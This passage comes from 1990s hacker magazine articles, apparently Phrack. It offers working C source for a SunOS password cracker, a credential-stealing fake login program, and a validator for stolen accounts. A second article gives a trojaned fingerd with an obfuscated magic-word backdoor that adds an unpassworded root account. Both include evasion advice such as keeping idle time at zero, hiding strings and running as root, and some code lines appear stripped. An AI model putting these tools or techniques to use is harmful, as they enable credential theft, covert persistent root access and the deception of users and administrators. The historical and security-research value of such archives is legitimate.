this mode has no luck, it then uses the accounts gecos 'comment'
information from the password file, splitting it into words and
trying these as passwords. Each word from the comment field is also
reversed and tried as a possible password.
-mf Brute-force single user mode uses all the above techniques for password
guessing as well as using a dictionary file to provide possible
passwords to crack a single account specified. If no dictionary filename
is given, this mode operates on the single account using the
same methods as mini-burst mode, without the dictionary.
Using shadow crack
To get program help from the command line just type :-
$ shcrack
which will show you all the modes of operation.
If you wanted to crack just the account 'root', located in
/etc/passwd(or elsewhere on NFS/NIS systems), using all methods
including a dictionary file called 'dict1', you would do :-
$ shcrack -mf -uroot -ddict1
to do the above without using the dictionary file, do :-
$ shcrack -mf -uroot
or to do the above but in password file 'miner' do :-
$ shcrack -mf -pminer -uroot
to start cracking all accounts in /etc/passwd, using minimum password
strategies do :-
$ shcrack -mb
to do the above but on a password file called 'miner' in your home
directory do :-
$ shcrack -mb -pminer
to start cracking all accounts in 'miner', using all strategies except
dictionary words do :-
$ shcrack -mi -pminer
ok, heres the code, ANSI C Compilers only :-
---cut here-------------------------------------------------------------------
/* Program : Shadow Crack
Author : (c)1994 The Shining/UPi (UK Division)
Date : Released 12/4/94
Unix type : SUNOS Shadowed systems only */
#define WORDSIZE 20 /* Maximum word size */
#define OUTFILE "data" /* File to store cracked account info */
void word_strat( void ), do_dict( void );
void add_nums( char * ), do_comment( char * );
void try_word( char * ), reverse_word( char * );
void find_mode( void ), burst_mode( void );
void mini_burst( void ), brute_force( void );
void user_info( void ), write_details( char * );
void pwfile_name( void ), disable_interrupts( void ), cleanup();
char *logname, *comment, *homedir, *shell, *dict, *mode,
*pwfile, *pwdauth();
struct passwd *getpwnam(), *pwentry;
extern char *optarg;
int option, uid, gid;
int main( int argc, char **argv )
if (argc < 2) {
printf("Shadow Crack - (c)1994 The Shining\n");
printf("SUNOS Shadow password brute force cracker\n\n");
printf("useage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]);
printf("[b] is burst mode, scans pwfile trying minimum\n");
printf(" password strategies on all i.d's\n\n");
printf("[i] is mini-burst mode, scans pwfile trying both\n");
printf(" userid, gecos info, and numbers to all i.d's\n\n");
printf("[f] is bruteforce mode, tries all above stategies\n");
printf(" as well as dictionary words\n\n");
printf("[pwfile] Uses the password file [pwfile], default\n");
printf(" is /etc/passwd\n\n");
printf("[loginid] Account you wish to crack, used with\n");
printf(" -mf bruteforce mode only\n\n");
printf("[dictfile] uses dictionary file [dictfile] to\n");
printf(" generate passwords when used with\n");
printf(" -mf bruteforce mode only\n\n");
/* Get options from the command line and store them in different
variables */
while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF)
case 'm':
mode = optarg;
case 'p':
pwfile = optarg;
case 'u':
logname = optarg;
case 'd':
dict = optarg;
printf("wrong options\n");
/* Routine to redirect interrupts */
void disable_interrupts( void )
signal(SIGHUP, SIG_IGN);
signal(SIGTSTP, cleanup);
signal(SIGINT, cleanup);
signal(SIGQUIT, cleanup);
signal(SIGTERM, cleanup);
/* If CTRL-Z or CTRL-C is pressed, clean up & quit */
void cleanup( void )
FILE *fp;
if ((fp = fopen("gecos", "r")) != NULL)
if ((fp = fopen("data", "r")) == NULL)
printf("\nNo accounts cracked\n");
/* Function to decide which mode is being used and call appropriate
routine */
void find_mode( void )
if (strcmp(mode, "b") == NULL)
if (strcmp(mode, "i") == NULL)
if (strcmp(mode, "f") == NULL)
printf("Sorry - No such mode\n");
/* Get a users information from the password file */
void user_info( void )
uid = pwentry->pw_uid;
gid = pwentry->pw_gid;
comment = pwentry->pw_gecos;
homedir = pwentry->pw_dir;
shell = pwentry->pw_shell;
/* Set the filename of the password file to be used, default is
/etc/passwd */
void pwfile_name( void )
if (pwfile != NULL)
/* Burst mode, tries user i.d. & then reverses it as possible passwords
on every account found in the password file */
void burst_mode( void )
while ((pwentry = getpwent()) != (struct passwd *) NULL)
logname = pwentry->pw_name;
try_word( logname );
reverse_word( logname );
/* Mini-burst mode, try above combinations as well as other strategies
which include adding numbers to the end of the user i.d. to generate
passwords or using the comment field information in the password
file */
void mini_burst( void )
while ((pwentry = getpwent()) != (struct passwd *) NULL)
logname = pwentry->pw_name;
/* Brute force mode, uses all the above strategies as well using a
dictionary file to generate possible passwords */
void brute_force( void )
if ((pwentry = getpwnam(logname)) == (struct passwd *) NULL) {
printf("Sorry - User unknown\n");
/* Calls the various password guessing strategies */
void word_strat()
try_word( logname );
reverse_word( logname );
add_nums( logname );
do_comment( comment );
/* Takes the user name as its argument and then generates possible
passwords by adding the numbers 0-9 to the end. If the username
is greater than 7 characters, don't bother */
void add_nums( char *wd )
int i;
char temp[2], buff[WORDSIZE];
if (strlen(wd) < 8) {
for (i = 0; i < 10; i++)
strcpy(buff, wd);
sprintf(temp, "%d", i);
strcat(wd, temp);
try_word( wd );
strcpy(wd, buff);
/* Gets info from the 'gecos' comment field in the password file,
then process this information generating possible passwords from it */
void do_comment( char *wd )
FILE *fp;
char temp[2], buff[WORDSIZE];
int c, flag;
flag = 0;
/* Open file & store users gecos information in it. w+ mode
allows us to write to it & then read from it. */
if ((fp = fopen("gecos", "w+")) == NULL) {
printf("Error writing gecos info\n");
fprintf(fp, "%s\n", wd);
strcpy(buff, "");
/* Process users gecos information, separate words by checking for the
',' field separater or a space. */
while ((c = fgetc(fp)) != EOF)
if (( c != ',' ) && ( c != ' ' )) {
sprintf(temp, "%c", c);
strncat(buff, temp, 1);
flag = 1;
if ((isspace(c)) || (c == ',') != NULL) {
if (flag == 1) {
if ((isspace(c)) || (iscntrl(c) == NULL))
ungetc(c, fp);
strcpy(buff, "");
flag = 0;
strcpy(temp, "");
/* Takes a string of characters as its argument(in this case the login
i.d., and then reverses it */
void reverse_word( char *wd )
char temp[2], buff[WORDSIZE];
int i;
i = strlen(wd) + 1;
strcpy(temp, "");
strcpy(buff, "");
if ((isalnum(wd[i]) || (ispunct(wd[i]))) != NULL) {
sprintf(temp, "%c", wd[i]);
strncat(buff, temp, 1);
} while(i != 0);
if (strlen(buff) > 1)
/* Read one word at a time from the specified dictionary for use
as possible passwords, if dictionary filename is NULL, ignore
this operation */
void do_dict( void )
FILE *fp;
char buff[WORDSIZE], temp[2];
int c;
strcpy(buff, "");
strcpy(temp, "");
if (dict == NULL)
if ((fp = fopen(dict, "r")) == NULL) {
printf("Error opening dictionary file\n");
while ((c = fgetc(fp)) != EOF)
if ((c != ' ') || (c != '\n')) {
strcpy(temp, "");
sprintf(temp, "%c", c);
strncat(buff, temp, 1);
if (c == '\n') {
if (buff[0] != ' ')
strcpy(buff, "");
/* Process the word to be used as a password by stripping \n from
it if necessary, then use the pwdauth() function, with the login
name and word to attempt to get a valid id & password */
void try_word( char pw[] )
int pwstat, i, pwlength;
char temp[2], buff[WORDSIZE];
strcpy(buff, "");
pwlength = strlen(pw);
for (i = 0; i != pwlength; i++)
if (pw[i] != '\n') {
strcpy(temp, "");
sprintf(temp, "%c", pw[i]);
strncat(buff, temp, 1);
if (strlen(buff) > 3 ) {
printf("Trying : %s\n", buff);
if (pwstat = pwdauth(logname, buff) == NULL) {
printf("Valid Password! - writing details to 'data'\n");
if (strcmp(mode, "f") == NULL)
/* If valid account & password, store this, along with the accounts
uid, gid, comment, homedir & shell in a file called 'data' */
void write_details( char *pw )
FILE *fp;
if ((fp = fopen(OUTFILE, "a")) == NULL) {
printf("Error opening output file\n");
fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid);
fprintf(fp, "%s:%s:%s\n", comment, homedir, shell);
---cut here-------------------------------------------------------------------
again to compile it do :-
$ gcc shcrack.c -o shcrack
$ acc shcrack.c -o shcrack
this can vary depending on your compiler.
The Ultimate Login Spoof
Well this subject has been covered many times before but its a while since
I have seen a good one, and anyway I thought other unix spoofs have had two
main problems :-
1) They were pretty easy to detect when running
2) They recorded any only shit entered.....
Well now I feel these problems have been solved with the spoof below.
Firstly, I want to say that no matter how many times spoofing is deemed as
a 'lame' activity, I think it is very underestimated.
When writing this I have considered every possible feature such a program
should have. The main ones are :-
1) To validate the entered login i.d. by searching for it in the
password file.
2) Once validated, to get all information about the account entered
including - real name etc from the comment field, homedir info
(e.g. /homedir/miner) and the shell the account is using and
store all this in a file.
3) To keep the spoofs tty idle time to 0, thus not to arouse the
administrators suspicions.
4) To validates passwords before storing them, on all unshadowed unix systems
& SUNOS shadowed/unshadowed systems.
5) To emulates the 'sync' dummy account, thus making it act like the
real login program.
6) Disable all interrupts(CTRL-Z, CTRL-D, CTRL-C), and automatically
quit if it has not grabbed an account within a specified time.
7) To automatically detect & display the hostname before the login prompt
e.g. 'ccu login:', this feature can be disabled if desired.
8) To run continuously until a valid i.d. & valid password are entered.
As well as the above features, I also added a few more to make the spoof
'foolproof'. At university, a lot of the users have been 'stung' by
login spoofs in the past, and so have become very conscious about security.
For example, they now try and get around spoofs by entering any old crap when
prompted for their login name, or to hit return a few times, to prevent any
'crappy' spoofs which may be running. This is where my spoof shines!,
firstly if someone was to enter -
login: dhfhfhfhryr
into the spoof, it checks to see if the login i.d. entered is
valid by searching for it in the password file. If it exists, the
spoof then tries to validate the password. If both the i.d. & password
are valid, these will be stored in a file called .data, along with
additional information about the account taken directly from the password
Now if, as in the case above, either the login name or password is
incorrect, the information is discarded, and the login spoof runs again,
waiting for a valid user i.d. & password to be entered.
Also, a lot of systems these days have an unpassworded account called
'sync', which when logged onto, usually displays the date & time the
sync account was last logged into, and from which server or tty,
the message of the day, syncs the disk, and then logs you straight out.
A few people have decided that the best way to dodge login spoofs is to
first login to this account then when they are automatically logged out,
to login to their own account.
They do this firstly, so that if a spoof is running it only records the
details of the sync account and secondly the spoof would not act as the
normal unix login program would, and therefore they would spot it and report
it, thus landing you in the shit with the system administrator.
However, I got around this problem so that when someone
tries to login as sync (or another account of a similar type, which you can
define), it acts exactly like the normal login program would, right down to
displaying the system date & time as well as the message of the day!!
The idle time facility
One of the main problems with unix spoofs, is they can be spotted
so easily by the administrator, as he/she could get a list of current
users on the system and see that an account was logged on, and had been
idle for maybe 30 minutes. They would then investigate & the spoof
would be discovered.
I have therefore incorporated a scheme in the spoof whereby
approx. every minute, the tty the spoof is executed from, is 'touched'
with the current time, this effectively simulates terminal activity &
keeps the terminals idle time to zero, which helps the spoofs chances
of not being discovered greatly.
The spoof also incorporates a routine which will automatically
keep track of approximately how long the spoof has been running, and if
it has been running for a specified time without grabbing an i.d. or password,
will automatically exit and run the real login program.
This timer is by default set to 12.5 minutes, but you can alter this time
if you wish.
Note: Due to the varying processing power of some systems, I could not
set the timer to exactly 60 seconds, I have therefore set it to 50,
incase it loses or gains extra time. Take this into consideration when
setting the spoofs timer to your own value. I recommend you
stick with the default, and under no circumstances let it run
for hours.
Password Validation techniques
The spoof basically uses 2 methods of password validation(or none at
all on a shadowed system V). Firstly, when the spoof is used on any unix
with an unshadowed password file, it uses the crypt function to validate a
password entered. If however the system is running SUNOS 4.1.+ and
incorporates the shadow password system, the program uses a function called
pwdauth(). This takes the login i.d. & decrypted password as its arguments
and checks to see if both are valid by encrypting the password and
comparing it to the shadowed password file which is usually located in
/etc/security and accessible only by root. By validating both the i.d. &
password we ensure that the data which is saved to file is correct and not
any old bullshit typed at the terminal!!!
Executing the Spoof
ok, now about the program. This is written in ANSI-C, so I hope you have a
compatible compiler, GCC or suns ACC should do it. Now the only time you
will need to change to the code is in the following circumstances :-
1) If you are to compile & run it on an unshadowed unix,
in which case remove all references to the pwdauth() function,
from both the declarations & the shadow checking routine, add
this code in place of the shadow password checking routine :-
if ( shadow == 1 ) {
invalid = 0;
invalid = 1;
2) Add the above code also to the spoof if you are running this on a system
V which is shadowed. In this case the spoof loses its ability to
validate the password, to my knowledge there is no sysV equivalent
of the pwdauth() function.
Everything else should be pretty much compatible. You should have no
problems compiling & running this on an unshadowed SUNOS machine, if
you do, make the necessary changes as above, but it compiled ok
on every unshadowed SUNOS I tested it on. The Spoof should
automatically detect whether a SUNOS system is shadowed or unshadowed
and run the appropriate code to deal with each situation.
Note: when you have compiled this spoof, you MUST 'exec' it from the
current shell for it to work, you must also only have one shell
running. e.g. from C or Bourne shell using the GNU C Compiler do :-
$ gcc spoof.c -o spoof
$ exec spoof
This replaces the current shell with the spoof, so when the spoof quits &
runs the real login program, the hackers account is effectively logged off.
ok enough of the bullshit, here's the spoof :-
----------cut here-------------------------------------------------------
/* Program : Unix login spoof
Author : The Shining/UPi (UK Division)
Date : Released 12/4/94
Unix Type : All unshadowed unix systems &
shadowed SUNOS systems
Note : This file MUST be exec'd from the shell. */
#define OUTFILE ".data" /* Data file to save account info into */
#define LOGPATH "/usr/bin/login" /* Path of real login program */
#define DUMMYID "sync" /* Dummy account on your system */
#define DLENGTH 4 /* Length of dummy account name */
FILE *fp;
/* Set up variables to store system time & date */
time_t now;
static int time_out, time_on, no_message, loop_cnt;
/* Set up a structure to store users information */
struct loginfo {
char logname[10];
char key[9];
char *comment;
char *homedir;
char *shell;
} u;
/* Use the unix function getpass() to read user password and
crypt() or pwdauth() (remove it below if not SUNOS)
to validate it etc */
char *getpass(), *gethostname(), *alarm(), *sleep(),
*crypt(), *ttyname(), *pwdauth(), motd, log_date[60],
pass[14], salt[3], *tty, cons[] = " on console ",
hname[72], *ld;
/* flag = exit status, ppid = pid shell, wait = pause length,
pwstat = holds 0 if valid password, shadow holds 1 if shadow
password system is being used, 0 otherwise. */
int flag, ppid, wait, pwstat, shadow, invalid;
/* Declare main functions */
void write_details(struct loginfo *);
void catch( void ), disable_interrupts( void );
void log_out( void ), get_info( void ),
invalid_login( void ), prep_str( char * );
/* set up pointer to point to pwfile structure, and also
a pointer to the utime() structure */
struct passwd *pwentry, *getpwnam();
struct utimbuf *times;
int main( void )
/* Initialise main program variables to 0, change 'loop_cnt' to 1
if you do not want the machines host name to appear with
the login prompt! (e.g. prompt is `login:` instead of
'MIT login:' etc) */
wait = 3; /* Holds value for pause */
flag = 0; /* Spoof ends if value is 1 */
loop_cnt = 0; /* Change this to 1 if no host required */
time_out = 0; /* Stops timer if spoof has been used */
time_on = 0; /* Holds minutes spoof has been running */
disable_interrupts(); /* Call function to disable Interrupts */
/* Get system time & date and store in log_date, this is
displayed when someone logs in as 'sync' */
now = time(NULL);
strftime(log_date, 60, "Last Login: %a %h %d %H:%M:%S", localtime(&now));
strcat(log_date, cons);
ld = log_date;
/* Get Hostname and tty name */
gethostname(hname, 64);
strcat(hname, " login: ");
tty = ttyname();
/* main routine */
while( flag == 0 )
invalid = 0; /* Holds 1 if id +/or pw are invalid */
shadow = 0; /* 1 if shadow scheme is in operation */
no_message = 0; /* Flag for Login Incorrect msg */
alarm(50); /* set timer going */
get_info(); /* get user i.d. & password */
/* Check to see if the user i.d. entered is 'sync', if it is
display system time & date, display message of the day and
then run the spoof again, insert the account of your
choice here, if its not sync, but remember to put
the length of the accounts name next to it! */
if (strncmp(u.logname, DUMMYID, DLENGTH) == NULL) {
printf("%s\n", ld);
if ((fp = fopen("/etc/motd", "r")) != NULL) {
while ((motd = getc(fp)) != EOF)
no_message = 1;
/* Check if a valid user i.d. has been input, then check to see if
the password system is shadowed or unshadowed.
If both the user i.d. & password are valid, get additional info
from the password file, and store all info in a file called .data,
then exit spoof and run real login program */
setpwent(); /* Rewind pwfile to beign processing */
if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) {
invalid = 1;
flag = 0;
strncpy(salt, pwentry->pw_passwd, 2);
/* Check for shadowed password system, in SUNOS, the field in /etc/passwd
should begin with '##', in system V it could contain an 'x', if none
of these exist, it checks that the entry = 13 chars, if less then
shadow system will probably be implemented (unless acct has been
disabled) */
if ( invalid == 0 ) {
if ((strcmp(salt, "##")) || (strncmp(salt, "x", 1)) == NULL)
shadow = 1;
if (strlen(pwentry->pw_passwd) < 13)
shadow = 1;
/* If unshadowed, use the salt from the pwfile field & the key to
form the encrypted password which is checked against the entry
in the password file, if it matches, then all is well, if not,
spoof runs again!! */
if ( shadow != 1 ) {
if (strcmp(pwentry->pw_passwd, crypt(u.key, salt)) == NULL)
invalid = 0;
invalid = 1;
/* If SUNOS Shadowing is in operation, use the pwdauth() function
to validate the password, if not SUNOS, substitute this code
with the routine I gave earlier! */
if ( shadow == 1 ) {
if (pwstat = pwdauth(u.logname, u.key) == NULL)
invalid = 0;
invalid = 1;
/* If we have a valid account & password, get user info from the
pwfile & store it */
if ( invalid == 0 ) {
u.comment = pwentry->pw_gecos;
u.homedir = pwentry->pw_dir;
u.shell = pwentry->pw_shell;
/* Open file to store user info */
if ((fp = fopen(OUTFILE, "a")) == NULL)
no_message = 1;
flag = 1;
flag = 0;
endpwent(); /* Close pwfile */
if (no_message == 0)
} /* end while */
log_out(); /* call real login program */
/* Function to read user i.d. & password */
void get_info( void )
char user[11];
unsigned int string_len;
strcpy(user, "\n");
/* Loop while some loser keeps hitting return when asked for user
i.d. and if someone hits CTRL-D to break out of spoof. Enter
a # at login to exit spoof. Uncomment the appropriate line(s)
below to customise the spoof to look like your system */
while ((strcmp(user, "\n") == NULL) && (!feof(stdin)))
/* printf("Scorch Ltd SUNOS 4.1.3\n\n); */
if (loop_cnt > 0)
strcpy(hname, "login: ");
printf("%s", hname);
fgets(user, 9, stdin);
/* Back door for hacker, # at present, can be changed,
but leave \n in. */
if (strcmp(user, "#\n") == NULL)
/* Strip \n from login i.d. */
if (strlen(user) < 8)
string_len = strlen(user) - 1;
string_len = strlen(user);
strncpy(u.logname, user, string_len);
/* check to see if CTRL-D has occurred because it does not
generate an interrupt like CTRL-C, but instead generates
an end-of-file on stdin */
if (feof(stdin)) {
/* Turn off screen display & read users password */
strncpy(u.key, getpass("Password:"), 8);
/* Function to increment the timer which holds the amount of time
the spoof has been running */
void catch( void )
/* If spoof has been running for 15 minutes, and has not
been used, stop timer and call spoof exit routine */
if ( time_out == 0 ) {
if (time_on == 15) {
/* 'Touch' your tty, effectively keeping terminal idle time to 0 */
utime(tty, times);
/* Initialise a string with \0's */
void prep_str( char str[] )
int strl, cnt;
strl = strlen(str);
for (cnt = 0; cnt != strl; cnt++)
str[cnt] = ' ';
/* function to catch interrupts, CTRL-C & CTRL-Z etc as
well as the timer signals */
void disable_interrupts( void )
signal(SIGALRM, catch);
signal(SIGINT, SIG_IGN);
/* Write the users i.d., password, personal information, homedir
and shell to a file */
void write_details(struct loginfo *sptr)
fprintf(fp, "%s:%s:", sptr->logname, sptr->key);
fprintf(fp, "%d:%d:", pwentry->pw_uid, pwentry->pw_gid);
fprintf(fp, "%s:%s:", sptr->comment, sptr->homedir);
fprintf(fp, "%s\n", sptr->shell);
fprintf(fp, "\n");
/* Display login incorrect only if the user hasn't logged on as
'sync' */
void invalid_login( void )
if ( flag == 1 && pwstat == 0 )
if ( no_message == 0 )
printf("Login incorrect\n");
/* Displays appropriate message, exec's the real login program,
this replaces the spoof & effectively logs spoof's account off.
Note: this spoof must be exec'd from the shell to work */
void log_out( void )
time_out = 1;
if ( no_message == 1 ) {
printf("Login incorrect\n");
execl(LOGPATH, "login", (char *)0);
----------cut here-------------------------------------------------------
then delete the source, run it and wait for some sucker to login!.
If you do initially run this spoof from your account, I suggest you
remove it when you have grabbed someone's account and run it from theirs
from then on, this reduces your chances of being caught!
User i.d. & Password Validator
Now if you are familiar with the unix Crack program, as I'm sure most of
you are ;-), or if you have used my spoof to grab some accounts,
this little program could be of some use. Say you have snagged
quit a few accounts, and a few weeks later you wanna see if they are still
alive, instead of logging onto them, then logging out again 20 or 30 times
which can take time, and could get the system admin looking your way, this
program will continuously ask you to enter a user i.d. & password, then
validate them both by actually using the appropriate entry in the password
file. All valid accounts are then stored along with other info from the
password file, in a data file. The program loops around until you stop it.
This works on all unshadowed unix systems, and, you guessed it!, shadowed
SUNOS systems.
If you run it on an unshadowed unix other than SUNOS, remove all references
to pwdauth(), along with the shadow password file checking routine,
if your on sysV, your shit outa luck! anyway, here goes :-
---cut here---------------------------------------------------------------
/* Program : To validate accounts & passwords on both
shadowed & unshadowed unix systems.
Author : The Shining/UPi (UK Division)
Date : Released 12/4/94
UNIX type : All unshadowed systems, and SUNOS shadowed systems */
FILE *fp;
int pw_system( void ), shadowed( void ), unshadowed( void );
void write_info( void ), display_notice( void );
struct passwd *pwentry, *getpwnam();
struct user {
char logname[10];
char key[9];
char salt[3];
} u;
char *getpass(), *pwdauth(), *crypt(), ans[2];
int invalid_user, stat;
int main( void )
strcpy(ans, "y");
while (strcmp(ans, "y") == NULL)
invalid_user = stat = 0;
printf("Enter login id:");
scanf("%9s", u.logname);
strcpy(u.key, getpass("Password:"));
if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL)
invalid_user = 1;
strncpy(u.salt, pwentry->pw_passwd, 2);
if (invalid_user != 1) {
if ((stat = pw_system()) == 1) {
if ((stat = unshadowed()) == NULL) {
printf("Unshadowed valid account! - storing details\n");
if ((stat = shadowed()) == NULL) {
printf("SUNOS Shadowed valid account! - storing details\n");
invalid_user = 2;
if (invalid_user == 1)
printf("User unknown/not found in password file\n");
if (invalid_user == 2 )
printf("Password invalid\n");
printf("\n\nValidate another account?(y/n): ");
scanf("%1s", ans);
/* Check to see if shadow password system is used, in SUNOS the field
in /etc/passwd starts with a '#', if not, check to see if entry
is 13 chars, if not shadow must be in use. */
int pw_system( void )
if (strlen(pwentry->pw_passwd) != 13)
if (strcmp(u.salt, "##") == NULL)
/* If system is unshadowed, get the 2 character salt from the password
file, and use this to encrypt the password entered. This is then
compared against the password file entry. */
int unshadowed( void )
if (pwentry->pw_passwd == crypt(u.key, u.salt))
/* If SUNOS shadowe system is used, use the pwdauth() function to validate
the password stored in the /etc/security/passwd.adjunct file */
int shadowed( void )
int pwstat;
if (pwstat = pwdauth(u.logname, u.key) == NULL)
/* Praise myself!!!! */
void display_notice( void )
printf("Unix Account login id & password validator.\n");
printf("For all unshadowed UNIX systems & shadowed SUNOS only.\n\n");
printf("(c)1994 The Shining\n\n\n\n");
/* Open a file called 'data' and store account i.d. & password along with
other information retrieved from the password file */
void write_info( void )
/* Open a file & store account information from pwfile in it */
if ((fp = fopen("data", "a")) == NULL) {
printf("error opening output file\n");
fprintf(fp, "%s:%s:%d:", u.logname, u.key, pwentry->pw_uid);
fprintf(fp, "%d:%s:", pwentry->pw_gid, pwentry->pw_gecos);
fprintf(fp, "%s:%s\n", pwentry->pw_dir, pwentry->pw_shell);
-----cut here------------------------------------------------------------------
The above programs will not compile under non-ansi C compilers without quite
a bit of modification. I have tested all these programs on SUNOS both
shadowed & unshadowed, though they should work on other systems with
little modification (except the shadow password cracker, which is SUNOS
shadow system specific).
Regards to the following guys :-
Archbishop & The Lost Avenger/UPi, RamRaider/QTX,
the guys at United International Perverts(yo Dirty Mac & Jasper!)
and all I know.
(c) 1994 The Shining (The NORTH!, U.K.)
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 12 of 28
The fingerd trojan horse
Original article by Hitman Italy for Phrack Inc.
This article is for informational purpose only, I'm not liable for
any damage or illegal activity perpetrated using the source or the
informations in the article.
-=- + -
So you have gained access to a system and want to keep on hacking without
being kicked off by a smart operator, there are dozen methods you can use,
usually, if an operator figure out that his system is under attack, he'll
check out the login program and telnetd for backdoors, then the telnet for
logging activities or network sniffers and so on.. if nothing is found
he'll realize the hacker is a dumb ass and he'll just modify the passwd to
prevent him from logging on (in most cases), here comes my fingerd trojan.
This scheme is quite original (I've never seen it used) and the source is
compact enough to be fitted into a MAG. The fingerd as all you know (I
hope) is the finger server run by inetd when a client opens the finger
port (N.79), of course if the port is locked, or you have a network
firewall, do not use this code.
---------- + CUT HERE + -----------------------------------------------
/* The Fingerd trojan by Hitman Italy
* This source cannot be spread without the whole article
* but you can freely implement or modify it for personal use
static char copyright[] = ""; /* Add the copyright string here */
static char sccsid[] = ""; /* Add the sccsid string here */
#define PATH_FINGER "/usr/ucb/finger"
#define CODE 161
char *HitCrypt(ch)
char *ch;
char *b;
while ((*(ch++)^=CODE)!=0x00);
int argc;
char *argv[];
register FILE *fp;
register int ch;
register char *lp;
int p[2];
static char exor[4][23]={
143,143,143,CODE} };
#define ENTRIES 50
char **ap, *av[ENTRIES + 1], line[1024], *strtok();
#ifdef LOGGING /* unused, leave it for "strings" command */
struct sockaddr_in sin;
int sval;
sval = sizeof(sin);
if (getpeername(0, &sin, &sval) < 0)
if (!fgets(line, sizeof(line), stdin))
av[0] = "finger";
for (lp = line, ap = &av[1];;) {
*ap = strtok(lp, " \t\r\n");
if (!*ap)
if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
*ap = "-l";
if (++ap == av + ENTRIES)
lp = NULL;
if (pipe(p) < 0)
switch(fork()) {
case 0:
if (p[1] != 1) {
(void)dup2(p[1], 1);
/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
if (av[1])
if (strcmp( (HitCrypt(&exor[0][0])) ,av[1])==0) {
if(!(fp=fopen( (HitCrypt(&exor[1][0])) ,"a")))
fprintf(fp,"%s\n", HitCrypt(&exor[2][0]));
printf("%s\n", HitCrypt(&exor[3][0]));
/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/
if (execv(PATH_FINGER, av)==-1)
fprintf(stderr,"No local finger program found\n");
case -1:
if (!(fp = fdopen(p[0], "r")))
while ((ch = getc(fp)) != EOF) {
char *prg,*msg;
fprintf(stderr, "%s: ", prg);
--------- + CUT HERE + ----------------------------------------------
I think it's quite easy to understand, first of all, inetd opens the
socket and pipes the the input data through the fingerd
* if (!fgets(line, sizeof(line), stdin))
* exit(1);
* av[0] = "finger";
* for (lp = line, ap = &av[1];;) {
* *ap = strtok(lp, " \t\r\n");
* if (!*ap)
* break;
* if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
* *ap = "-l";
here it gets the data from stdin and parses them (strtok) converting (due
to RFC742) any '/W' or '/w' old options in '-l'
* switch(fork()) {
* case 0:
* (void)close(p[0]);
* if (p[1] != 1) {
* (void)dup2(p[1], 1);
* (void)close(p[1]);
* }
the task goes into the background
* if (execv(PATH_FINGER, av)==-1)
* fprintf(stderr,"No local finger program found\n");
here the daemon executes the local finger with remote parameters
* (void)close(p[1]);
* if (!(fp = fdopen(p[0], "r")))
* fatal(argv[0],"fdopen");
* while ((ch = getc(fp)) != EOF) {
* putchar(ch);
the output is piped back to the remote system
That's how the finger daemon works... now the trojan, basically we'll
check out the input finger user till the magic code matches, then our
sleepin' trojan will wake up and do the job... let's examine my code
/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
if (av[1])
if (strcmp("hit",av[1])==0) {
printf("Backdoor activated...\n");
/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/
When the "hit" magic code matches the trojan will modify the passwd adding
a fake unpassworded root user named "hit", so you can relogin as root,
cover your tracks and keep on working. Of course this is an example, you
can do what you want simply adding your custom code, you may remote cat a
log file without logging in, or remote kill an user, maybe root logins are
disabled so you have to make a suid shell and add a normal entry in the
passwd or open a port and so on, you can also use multiple codes if you
like. If the magic word doesn't match of course the finger will work out
# finger hit@666.666.666.666
Backdoor activated...
Well done! You have gained a root access.
# cat /etc/passwd
root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh
ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh
^^^ they run NIS... anyway our local root login will work fine
#finger hit@hacked.system.com
here is the log
user: xit001 from: hell.com ip: 666.666.666.666 has pw: xit001
user: yit001 from: (...)
That's really useful to collect logfiles without logging in and leave
tracks everywhere.
Now the problem....
If you want to use the fingerd to run world accessible commands you won't
have any problem but if you require root privileges check this out:
#grep fingerd /etc/inetd.conf
finger stream tcp nowait nobody /usr/etc/in.fingerd in.fingerd
On SunOs 4.x.x the fingerd runs as nobody, the fake user (used with
NFS etc..), as nobody of course you cannot modify the passwd, so edit the
finger stream tcp nowait root /usr/etc/in.fingerd in.fingerd
now you have to refesh the inetd process
#kill -HUP
now you can do what you want, many unix clones let the fingerd running as
root by default... and even if you have to modify the inetd.conf an
operator unlikely will realize what is appening since all other daemons
run as root.
Why have I crypted all data?
#strings login
Yeah d00dz! That's a //\/\eg/+\Backd0[+]r by MASTER(...) of MEGA(...)
Lame or not? All alien data must be crypted.. a fast exor crypting
routine will work fine, of course you can use the standard crypt function
or other (slow) algorithms but since security is not important (we just
want to make our texts invisible) I suggest using my fast algo,to create
the exor matrix simply put all texts on a file and use the little
ExorCrypt utility I have included UUencoded below (amiga/msdos version).
echo > test "this is a test"
Acrypt test test.o
line crypted: 1
type test.o
static char exor[]={
char *ExorCrypt(ch)
char *ch;
char *b;
while ((*(ch++)^=0xa1)!=0x00);
The utility will create the exor vector (matrix) (from the 80 column
formatted ascii input text) and the specific decoding function, If you do
not supply a key "$a1" will be used, remember to add a NewLine if
necessary, the vector/matrix never contain them.
Before compiling the whole thing you must add the copyright and sccsid
strings I have not included (they may vary).
Let's simply do: (SunOs)
#strings /usr/etc/in.fingerd
@(#) Copyright (c) 1983 Regents of the University of California.
All rights reserved. ^^^^ COPYRIGHT STRING
@(#)in.fingerd.c 1.6 88/11/28 SMI <<<< SCCSID STRING
No local finger program found
The top of source becomes:
static char copyright[]=
"@(#) Copyright (c) 1983 Regents of the University of California.\n\
All rights reserverd.\n";
static char sccsid[]="@(#)in.fingerd.c 1.6 88/11/28 SMI"
That's all. Now you can compile and install your fingerd trojan,
the source was adapted for SunOS but you can port it on many unix
clones without troubles.
Few final words to:
Operators: How to defeat this trojan? First of all check the inetd.conf,
then do VARIOUS fingerd checksums (maybe even the "sum" command
is a trojan :) if you discover the trojan wrap the finger port
so you can track down the hacker (usually all wtmp/lastlog logs
are removed) or wrap everything modifying the daemons, do NOT use
the inetd.conf_jump_new_daemon scheme, if you can, add a fingerd
tripwire entry to prevent future installations.
